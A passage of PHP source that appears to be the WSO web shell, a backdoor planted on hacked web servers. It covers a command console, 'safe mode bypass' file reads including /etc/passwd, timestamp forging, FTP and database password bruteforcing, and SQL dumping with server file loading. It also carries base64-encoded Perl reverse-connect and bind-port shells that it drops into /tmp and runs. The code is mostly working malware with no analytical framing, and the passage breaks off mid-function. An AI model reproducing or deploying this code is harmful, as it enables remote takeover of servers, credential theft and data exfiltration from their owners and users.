  1265.         case 'hexdump':
  1266.             $c = @file_get_contents($_POST['p1']);
  1267.             $n = 0;
  1268.             $h = array('00000000<br>','','');
  1269.             $len = strlen($c);
  1270.             for ($i=0; $i<$len; ++$i) {
  1271.                 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  1272.                 switch ( ord($c[$i]) ) {
  1273.                     case 0:  $h[2] .= ' '; break;
  1274.                     case 9:  $h[2] .= ' '; break;
  1275.                     case 10: $h[2] .= ' '; break;
  1276.                     case 13: $h[2] .= ' '; break;
  1277.                     default: $h[2] .= $c[$i]; break;
  1278.                 }
  1279.                 $n++;
  1280.                 if ($n == 32) {
  1281.                     $n = 0;
  1282.                     if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  1283.                     $h[1] .= '<br>';
  1284.                     $h[2] .= "\n";
  1285.                 }
  1286.              }
  1287.             echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  1288.             break;
  1289.         case 'rename':
  1290.             if( !empty($_POST['p3']) ) {
  1291.                 if(!@rename($_POST['p1'], $_POST['p3']))
  1292.                     echo 'Can\'t rename!<br>';
  1293.                 else
  1294.                     die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  1295.             }
  1296.             echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
  1297.             break;
  1298.         case 'touch':
  1299.             if( !empty($_POST['p3']) ) {
  1300.                 $time = strtotime($_POST['p3']);
  1301.                 if($time) {
  1302.                     if(!touch($_POST['p1'],$time,$time))
  1303.                         echo 'Fail!';
  1304.                     else
  1305.                         echo 'Touched!';
  1306.                 } else echo 'Bad time format!';
  1307.             }
  1308.             clearstatcache();
  1309.             echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
  1310.             break;
  1311.     }
  1312.     echo '</div>';
  1313.     wsoFooter();
  1314.     exit;
  1315. }
  1316.  
  1317. function actionSafeMode() {
  1318.     $temp='';
  1319.     ob_start();
  1320.     switch($_POST['p1']) {
  1321.         case 1:
  1322.             $temp=@tempnam($test, 'cx');
  1323.             if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  1324.                 echo @file_get_contents($temp);
  1325.                 unlink($temp);
  1326.             } else
  1327.                 echo 'Sorry... Can\'t open file';
  1328.             break;
  1329.         case 2:
  1330.             $files = glob($_POST['p2'].'*');
  1331.             if( is_array($files) )
  1332.                 foreach ($files as $filename)
  1333.                     echo $filename."\n";
  1334.             break;
  1335.         case 3:
  1336.             $ch = curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!', '', __FILE__));
  1337.             curl_exec($ch);
  1338.             break;
  1339.         case 4:
  1340.             ini_restore("safe_mode");
  1341.             ini_restore("open_basedir");
  1342.             include($_POST['p2']);
  1343.             break;
  1344.         case 5:
  1345.             for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  1346.                 $uid = @posix_getpwuid($_POST['p2']);
  1347.                 if ($uid)
  1348.                     echo join(':',$uid)."\n";
  1349.             }
  1350.             break;
  1351.     }
  1352.     $temp = ob_get_clean();
  1353.     wsoHeader();
  1354.     echo '<h1>Safe mode bypass</h1><div class=content>';
  1355.     echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
  1356.     if($temp)
  1357.         echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
  1358.     echo '</div>';
  1359.     wsoFooter();
  1360. }
  1361.  
  1362. function actionConsole() {
  1363.  
  1364.  
  1365.  if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
  1366.         $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
  1367.         $_POST['p1'] .= ' 2>&1';
  1368.     } elseif(!empty($_POST['p1']))
  1369.         $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;
  1370.  
  1371.  
  1372.  
  1373.  
  1374.     if(isset($_POST['ajax'])) {
  1375.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  1376.         ob_start();
  1377.         echo "document.cf.cmd.value='';\n";
  1378.         $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
  1379.         if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    {
  1380.             if(@chdir($match[1])) {
  1381.                 $GLOBALS['cwd'] = @getcwd();
  1382.                 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  1383.             }
  1384.         }
  1385.         echo "document.cf.output.value+='".$temp."';";
  1386.         echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  1387.         $temp = ob_get_clean();
  1388.         echo strlen($temp), "\n", $temp;
  1389.         exit;
  1390.     }
  1391.     wsoHeader();
  1392.     echo "<script>
  1393. if(window.Event) window.captureEvents(Event.KEYDOWN);
  1394. var cmds = new Array('');
  1395. var cur = 0;
  1396. function kp(e) {
  1397.     var n = (window.Event) ? e.which : e.keyCode;
  1398.     if(n == 38) {
  1399.         cur--;
  1400.         if(cur>=0)
  1401.             document.cf.cmd.value = cmds[cur];
  1402.         else
  1403.             cur++;
  1404.     } else if(n == 40) {
  1405.         cur++;
  1406.         if(cur < cmds.length)
  1407.             document.cf.cmd.value = cmds[cur];
  1408.         else
  1409.             cur--;
  1410.     }
  1411. }
  1412. function add(cmd) {
  1413.     cmds.pop();
  1414.     cmds.push(cmd);
  1415.     cmds.push('');
  1416.     cur = cmds.length-1;
  1417. }
  1418. </script>";
  1419.     echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
  1420.     foreach($GLOBALS['aliases'] as $n => $v) {
  1421.         if($v == '') {
  1422.             echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  1423.             continue;
  1424.         }
  1425.         echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  1426.     }
  1427.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  1428.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  1429.     echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
  1430.     if(!empty($_POST['p1'])) {
  1431.         echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
  1432.     }
  1433.     echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
  1434.     echo '</form></div><script>document.cf.cmd.focus();</script>';
  1435.     wsoFooter();
  1436. }
  1437.  
  1438. function actionLogout() {
  1439.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1440.     die('bye!');
  1441. }
  1442. //Krist_ALL EDITION ICQ 106777
  1443. function actionSelfRemove() {
  1444.  
  1445.     if($_POST['p1'] == 'yes')
  1446.         if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
  1447.             die('Shell has been removed');
  1448.         else
  1449.             echo 'unlink error!';
  1450.     if($_POST['p1'] != 'yes')
  1451.         wsoHeader();
  1452.     echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1453.     wsoFooter();
  1454. }
  1455.  
  1456. function actionBruteforce() {
  1457.     wsoHeader();
  1458.     if( isset($_POST['proto']) ) {
  1459.         echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
  1460.         if( $_POST['proto'] == 'ftp' ) {
  1461.             function bruteForce($ip,$port,$login,$pass) {
  1462.                 $fp = @ftp_connect($ip, $port?$port:21);
  1463.                 if(!$fp) return false;
  1464.                 $res = @ftp_login($fp, $login, $pass);
  1465.                 @ftp_close($fp);
  1466.                 return $res;
  1467.             }
  1468.         } elseif( $_POST['proto'] == 'mysql' ) {
  1469.             function bruteForce($ip,$port,$login,$pass) {
  1470.                 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
  1471.                 @mysql_close($res);
  1472.                 return $res;
  1473.             }
  1474.         } elseif( $_POST['proto'] == 'pgsql' ) {
  1475.             function bruteForce($ip,$port,$login,$pass) {
  1476.                 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
  1477.                 $res = @pg_connect($str);
  1478.                 @pg_close($res);
  1479.                 return $res;
  1480.             }
  1481.         }
  1482.         $success = 0;
  1483.         $attempts = 0;
  1484.         $server = explode(":", $_POST['server']);
  1485.         if($_POST['type'] == 1) {
  1486.             $temp = @file('/etc/passwd');
  1487.             if( is_array($temp) )
  1488.                 foreach($temp as $line) {
  1489.                     $line = explode(":", $line);
  1490.                     ++$attempts;
  1491.                     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
  1492.                         $success++;
  1493.                         echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
  1494.                     }
  1495.                     if(@$_POST['reverse']) {
  1496.                         $tmp = "";
  1497.                         for($i=strlen($line[0])-1; $i>=0; --$i)
  1498.                             $tmp .= $line[0][$i];
  1499.                         ++$attempts;
  1500.                         if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
  1501.                             $success++;
  1502.                             echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
  1503.                         }
  1504.                     }
  1505.                 }
  1506.         } elseif($_POST['type'] == 2) {
  1507.             $temp = @file($_POST['dict']);
  1508.             if( is_array($temp) )
  1509.                 foreach($temp as $line) {
  1510.                     $line = trim($line);
  1511.                     ++$attempts;
  1512.                     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
  1513.                         $success++;
  1514.                         echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
  1515.                     }
  1516.                 }
  1517.         }
  1518.         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
  1519.     }
  1520.     echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  1521.         .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  1522.         .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  1523.         .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  1524.         .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  1525.         .'<span>Server:port</span></td>'
  1526.         .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  1527.         .'<tr><td><span>Brute type</span></td>'
  1528.         .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  1529.         .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
  1530.         .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  1531.         .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  1532.         .'<td><input type=text name=login value="root"></td></tr>'
  1533.         .'<tr><td><span>Dictionary</span></td>'
  1534.         .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  1535.         .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
  1536.     echo '</div><br>';
  1537.     wsoFooter();
  1538. }
  1539.  
  1540. function actionSql() {
  1541.     class DbClass {
  1542.         var $type;
  1543.         var $link;
  1544.         var $res;
  1545.         function DbClass($type)    {
  1546.             $this->type = $type;
  1547.         }
  1548.         function connect($host, $user, $pass, $dbname){
  1549.             switch($this->type)    {
  1550.                 case 'mysql':
  1551.                     if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
  1552.                     break;
  1553.                 case 'pgsql':
  1554.                     $host = explode(':', $host);
  1555.                     if(!$host[1]) $host[1]=5432;
  1556.                     if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  1557.                     break;
  1558.             }
  1559.             return false;
  1560.         }
  1561.         function selectdb($db) {
  1562.             switch($this->type)    {
  1563.                 case 'mysql':
  1564.                     if (@mysql_select_db($db))return true;
  1565.                     break;
  1566.             }
  1567.             return false;
  1568.         }
  1569.         function query($str) {
  1570.             switch($this->type) {
  1571.                 case 'mysql':
  1572.                     return $this->res = @mysql_query($str);
  1573.                     break;
  1574.                 case 'pgsql':
  1575.                     return $this->res = @pg_query($this->link,$str);
  1576.                     break;
  1577.             }
  1578.             return false;
  1579.         }
  1580.         function fetch() {
  1581.             $res = func_num_args()?func_get_arg(0):$this->res;
  1582.             switch($this->type)    {
  1583.                 case 'mysql':
  1584.                     return @mysql_fetch_assoc($res);
  1585.                     break;
  1586.                 case 'pgsql':
  1587.                     return @pg_fetch_assoc($res);
  1588.                     break;
  1589.             }
  1590.             return false;
  1591.         }
  1592.         function listDbs() {
  1593.             switch($this->type)    {
  1594.                 case 'mysql':
  1595.                     return $this->res = @mysql_list_dbs($this->link);
  1596.                 break;
  1597.                 case 'pgsql':
  1598.                     return $this->res = $this->query("SELECT datname FROM pg_database");
  1599.                 break;
  1600.             }
  1601.             return false;
  1602.         }
  1603.         function listTables() {
  1604.             switch($this->type)    {
  1605.                 case 'mysql':
  1606.                     return $this->res = $this->query('SHOW TABLES');
  1607.                 break;
  1608.                 case 'pgsql':
  1609.                     return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_shadow'");
  1610.                 break;
  1611.             }
  1612.             return false;
  1613.         }
  1614.         function error() {
  1615.             switch($this->type)    {
  1616.                 case 'mysql':
  1617.                     return @mysql_error($this->link);
  1618.                 break;
  1619.                 case 'pgsql':
  1620.                     return @pg_last_error($this->link);
  1621.                 break;
  1622.             }
  1623.             return false;
  1624.         }
  1625.         function setCharset($str) {
  1626.             switch($this->type)    {
  1627.                 case 'mysql':
  1628.                     if(function_exists('mysql_set_charset'))
  1629.                         return @mysql_set_charset($str, $this->link);
  1630.                     else
  1631.                         $this->query('SET CHARSET '.$str);
  1632.                     break;
  1633.                 case 'pgsql':
  1634.                     return @pg_set_client_encoding($this->link, $str);
  1635.                     break;
  1636.             }
  1637.             return false;
  1638.         }
  1639.         function loadFile($str) {
  1640.             switch($this->type)    {
  1641.                 case 'mysql':
  1642.                     return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
  1643.                 break;
  1644.                 case 'pgsql':
  1645.                     $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
  1646.                     $r=array();
  1647.                     while($i=$this->fetch())
  1648.                         $r[] = $i['file'];
  1649.                     $this->query('drop table wso2');
  1650.                     return array('file'=>implode("\n",$r));
  1651.                 break;
  1652.             }
  1653.             return false;
  1654.         }
  1655.         function dump($table) {
  1656.             switch($this->type)    {
  1657.                 case 'mysql':
  1658.                     $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  1659.                     $create = mysql_fetch_array($res);
  1660.                     echo $create[1].";\n\n";
  1661.                     $this->query('SELECT * FROM `'.$table.'`');
  1662.                     while($item = $this->fetch()) {
  1663.                         $columns = array();
  1664.                         foreach($item as $k=>$v) {
  1665.                             $item[$k] = "'".@mysql_real_escape_string($v)."'";
  1666.                             $columns[] = "`".$k."`";
  1667.                         }
  1668.                     echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  1669.                     }
  1670.                 break;
  1671.                 case 'pgsql':
  1672.                     $this->query('SELECT * FROM '.$table);
  1673.                     $head = true;
  1674.                     while($item = $this->fetch()) {
  1675.                         $columns = array();
  1676.                         foreach($item as $k=>$v) {
  1677.                             $item[$k] = "'".addslashes($v)."'";
  1678.                             $columns[] = $k;
  1679.                         }
  1680.                     echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  1681.                     }
  1682.                     if(!$head)
  1683.                         if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
  1684.                 break;
  1685.             }
  1686.             return false;
  1687.         }
  1688.     };
  1689.     $db = new DbClass($_POST['type']);
  1690.     if(@$_POST['p2']=='download') {
  1691.         ob_start("ob_gzhandler", 4096);
  1692.         $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  1693.         $db->selectdb($_POST['sql_base']);
  1694.         header("Content-Disposition: attachment; filename=dump.sql");
  1695.         header("Content-Type: text/plain");
  1696.         foreach($_POST['tbl'] as $v)
  1697.                 $db->dump($v);
  1698.         exit;
  1699.     }
  1700.     wsoHeader();
  1701.     echo "
  1702. <h1>Sql browser</h1><div class=content>
  1703. <form name='sf' method='post'><table cellpadding='2' cellspacing='0'><tr>
  1704. <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
  1705. <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
  1706. <td><select name='type'><option value='mysql' ";
  1707.     if(@$_POST['type']=='mysql')echo 'selected';
  1708. echo ">MySql</option><option value='pgsql' ";
  1709. if(@$_POST['type']=='pgsql')echo 'selected';
  1710. echo ">PostgreSql</option></select></td>
  1711. <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
  1712. <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
  1713. <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
  1714.     $tmp = "<input type=text name=sql_base value=''>";
  1715.     if(isset($_POST['sql_host'])){
  1716.         if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  1717.             switch($_POST['charset']) {
  1718.                 case "Windows-1251": $db->setCharset('cp1251'); break;
  1719.                 case "UTF-8": $db->setCharset('utf8'); break;
  1720.                 case "KOI8-R": $db->setCharset('koi8r'); break;
  1721.                 case "KOI8-U": $db->setCharset('koi8u'); break;
  1722.                 case "cp866": $db->setCharset('cp866'); break;
  1723.             }
  1724.             $db->listDbs();
  1725.             echo "<select name=sql_base><option value=''></option>";
  1726.             while($item = $db->fetch()) {
  1727.                 list($key, $value) = each($item);
  1728.                 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  1729.             }
  1730.             echo '</select>';
  1731.         }
  1732.         else echo $tmp;
  1733.     }else
  1734.         echo $tmp;
  1735.     echo "</td>
  1736.                 <td><input type=submit value='>>'></td>
  1737.             </tr>
  1738.         </table>
  1739.         <script>
  1740.         
  1741.         s_db='".@addslashes($_POST['sql_base'])."';
  1742.             function fs(f) {
  1743.                 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
  1744.                     if(f.p1) f.p1.value='';
  1745.                     if(f.p2) f.p2.value='';
  1746.                     if(f.p3) f.p3.value='';
  1747.                 }
  1748.             }
  1749.         
  1750.             function st(t,l) {
  1751.                 document.sf.p1.value = 'select';
  1752.                 document.sf.p2.value = t;
  1753.                 if(l!=null)document.sf.p3.value = l;
  1754.                 document.sf.submit();
  1755.             }
  1756.             function is() {
  1757.                 for(i=0;i<document.sf.elements['tbl[]'].length;++i)
  1758.                     document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked;
  1759.             }
  1760.         </script>";
  1761.     if(isset($db) && $db->link){
  1762.         echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  1763.             if(!empty($_POST['sql_base'])){
  1764.                 $db->selectdb($_POST['sql_base']);
  1765.                 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
  1766.                 $tbls_res = $db->listTables();
  1767.                 while($item = $db->fetch($tbls_res)) {
  1768.                     list($key, $value) = each($item);
  1769.                     $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
  1770.                     $value = htmlspecialchars($value);
  1771.                     echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
  1772.                 }
  1773.                 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>";
  1774.                 if(@$_POST['p1'] == 'select') {
  1775.                     $_POST['p1'] = 'query';
  1776.                     $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
  1777.                     $num = $db->fetch();
  1778.                     $num = $num['n'];
  1779.                     echo "<span>".$_POST['p2']."</span> ($num) ";
  1780.                     for($i=0;$i<($num/30);$i++)
  1781.                         if($i != (int)$_POST['p3'])
  1782.                             echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
  1783.                         else
  1784.                             echo ($i+1)," ";
  1785.                     if($_POST['type']=='pgsql')
  1786.                         $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
  1787.                     else
  1788.                         $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
  1789.                     echo "<br><br>";
  1790.                 }
  1791.                 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
  1792.                     $db->query(@$_POST['p3']);
  1793.                     if($db->res !== false) {
  1794.                         $title = false;
  1795.                         echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
  1796.                         $line = 1;
  1797.                         while($item = $db->fetch())    {
  1798.                             if(!$title)    {
  1799.                                 echo '<tr>';
  1800.                                 foreach($item as $key => $value)
  1801.                                     echo '<th>'.$key.'</th>';
  1802.                                 reset($item);
  1803.                                 $title=true;
  1804.                                 echo '</tr><tr>';
  1805.                                 $line = 2;
  1806.                             }
  1807.                             echo '<tr class="l'.$line.'">';
  1808.                             $line = $line==1?2:1;
  1809.                             foreach($item as $key => $value) {
  1810.                                 if($value == null)
  1811.                                     echo '<td><i>null</i></td>';
  1812.                                 else
  1813.                                     echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  1814.                             }
  1815.                             echo '</tr>';
  1816.                         }
  1817.                         echo '</table>';
  1818.                     } else {
  1819.                         echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  1820.                     }
  1821.                 }
  1822.                 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
  1823.                 echo "</td></tr>";
  1824.             }
  1825.             echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
  1826.             if(@$_POST['p1'] == 'loadfile') {
  1827.                 $file = $db->loadFile($_POST['p2']);
  1828.                 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  1829.             }
  1830.     }
  1831.     echo '</div>';
  1832.     wsoFooter();
  1833. }
  1834. function actionNetwork() {
  1835.     wsoHeader();
  1836.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1837.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1838.     echo "<h1>Network tools</h1><div class=content>
  1839.     <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
  1840.     <span>Bind port to /bin/sh [perl]</span><br/>
  1841.     Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
  1842.     </form>
  1843.     <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
  1844.     <span>Back-connect  [perl]</span><br/>
  1845.     Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
  1846.     </form><br>";
  1847.     if(isset($_POST['p1'])) {
  1848.         function cf($f,$t) {
  1849.             $w=@fopen($f,"w") or @function_exists('file_put_contents');
  1850.             if($w)    {
  1851.                 @fwrite($w,@base64_decode($t));
  1852.                 @fclose($w);
  1853.             }
  1854.         }
  1855.         if($_POST['p1'] == 'bpp') {
  1856.             cf("/tmp/bp.pl",$bind_port_p);
  1857.             $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
  1858.             echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
  1859.              unlink("/tmp/bc.pl");
  1860.         }
  1861.         if($_POST['p1'] == 'bcp') {
  1862.             cf("/tmp/bc.pl",$back_connect_p);
  1863.             $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
  1864.             echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
  1865.             unlink("/tmp/bp.pl");
  1866.         }
  1867.     }
  1868.     echo '</div>';
  1869.     wsoFooter();
  1870. }
  1871. function actionRC() {
  1872.     if(!@$_POST['p1']) {
  1873.         $a = array(
  1874.             "uname" => php_uname(),
  1875.             "php_version" => phpversion(),
  1876.             "wso_version" => VERSION,
  1877.             "safemode" => @ini_get('safe_mode')
  1878.         );
  1879.         echo serialize($a);
  1880.     } else {
